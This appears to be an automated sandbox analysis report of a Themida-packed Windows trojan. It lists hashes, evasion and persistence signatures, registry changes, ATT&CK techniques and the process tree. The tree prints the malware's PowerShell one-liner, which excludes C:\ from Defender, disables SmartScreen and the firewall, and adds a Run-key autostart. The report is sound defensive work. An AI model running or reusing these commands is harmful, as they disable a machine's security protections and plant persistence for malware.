a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99

Analysis

max time kernel
165s
max time network
165s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
15-02-2022 07:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
Size

3.3MB
MD5

54da56b5f62fedb130a09c3bdc7c8e08
SHA1

1c5f44b45d798534f3d047d8f2596439ba02140c
SHA256

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99
SHA512

c76c39305b9f216a114b255c3388c40e0981cd2a6a41ff7aab10d3ce346349910a200ad3e16cf570909752d64f726e3b04d2ba07209a207e6311cc3d78d2fefc

Score

10^/10

evasion persistence themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" powershell.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

UpSys.exeUpSys.exeUpSys.exe

pid process

2968 UpSys.exe
1992 UpSys.exe
1204 UpSys.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"	powershell.exe

pid	process
2968	UpSys.exe
1992	UpSys.exe
1204	UpSys.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

Drops startup file 1 IoCs

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/640-130-0x00007FF7D2850000-0x00007FF7D3158000-memory.dmp	themida
behavioral2/memory/640-131-0x00007FF7D2850000-0x00007FF7D3158000-memory.dmp	themida
C:\ProgramData\MicrosoftNetwork\System.exe	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe"	powershell.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

pid process

640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

pid	process
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

Drops file in Windows directory 3 IoCs

Processes:

TiWorker.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\WinSxS\pending.xml	TiWorker.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat	svchost.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MusNotifyIcon.exe

description	ioc	process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MusNotifyIcon.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MusNotifyIcon.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

svchost.exepowershell.exeUpSys.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "3.703550"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	UpSys.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	UpSys.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132895605555521796"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0"	svchost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exea1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exeUpSys.exe

pid	process
1396	powershell.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1396	powershell.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
2968	UpSys.exe
2968	UpSys.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeUpSys.exeUpSys.exepowershell.exeTiWorker.exe

description	pid	process
Token: SeDebugPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	2968	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	2968	UpSys.exe
Token: SeIncreaseQuotaPrivilege	2968	UpSys.exe
Token: 0	2968	UpSys.exe
Token: SeBackupPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	1992	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	1992	UpSys.exe
Token: SeIncreaseQuotaPrivilege	1992	UpSys.exe
Token: SeBackupPrivilege	1396	powershell.exe
Token: SeRestorePrivilege	1396	powershell.exe
Token: SeSecurityPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe
Token: SeBackupPrivilege	1272	TiWorker.exe
Token: SeRestorePrivilege	1272	TiWorker.exe
Token: SeSecurityPrivilege	1272	TiWorker.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exepowershell.exeUpSys.exe

description	pid	process	target process
PID 640 wrote to memory of 1396	640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe	powershell.exe
PID 640 wrote to memory of 1396	640	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe	powershell.exe
PID 1396 wrote to memory of 2968	1396	powershell.exe	UpSys.exe
PID 1396 wrote to memory of 2968	1396	powershell.exe	UpSys.exe
PID 1396 wrote to memory of 2664	1396	powershell.exe	netsh.exe
PID 1396 wrote to memory of 2664	1396	powershell.exe	netsh.exe
PID 1204 wrote to memory of 4076	1204	UpSys.exe	powershell.exe
PID 1204 wrote to memory of 4076	1204	UpSys.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
"C:\Users\Admin\AppData\Local\Temp\a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe"
1⤵
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
2⤵
- Modifies security service
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1396

C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968

C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4076

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
3⤵
PID:2664

C:\Windows\system32\MusNotifyIcon.exe
%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
1⤵
- Checks processor information in registry
PID:3504

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:388

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1272

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\MicrosoftNetwork\System.exe
MD5
54da56b5f62fedb130a09c3bdc7c8e08

SHA1
1c5f44b45d798534f3d047d8f2596439ba02140c

SHA256
a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99

SHA512
c76c39305b9f216a114b255c3388c40e0981cd2a6a41ff7aab10d3ce346349910a200ad3e16cf570909752d64f726e3b04d2ba07209a207e6311cc3d78d2fefc

Download Submit
C:\ProgramData\UpSys.exe
MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
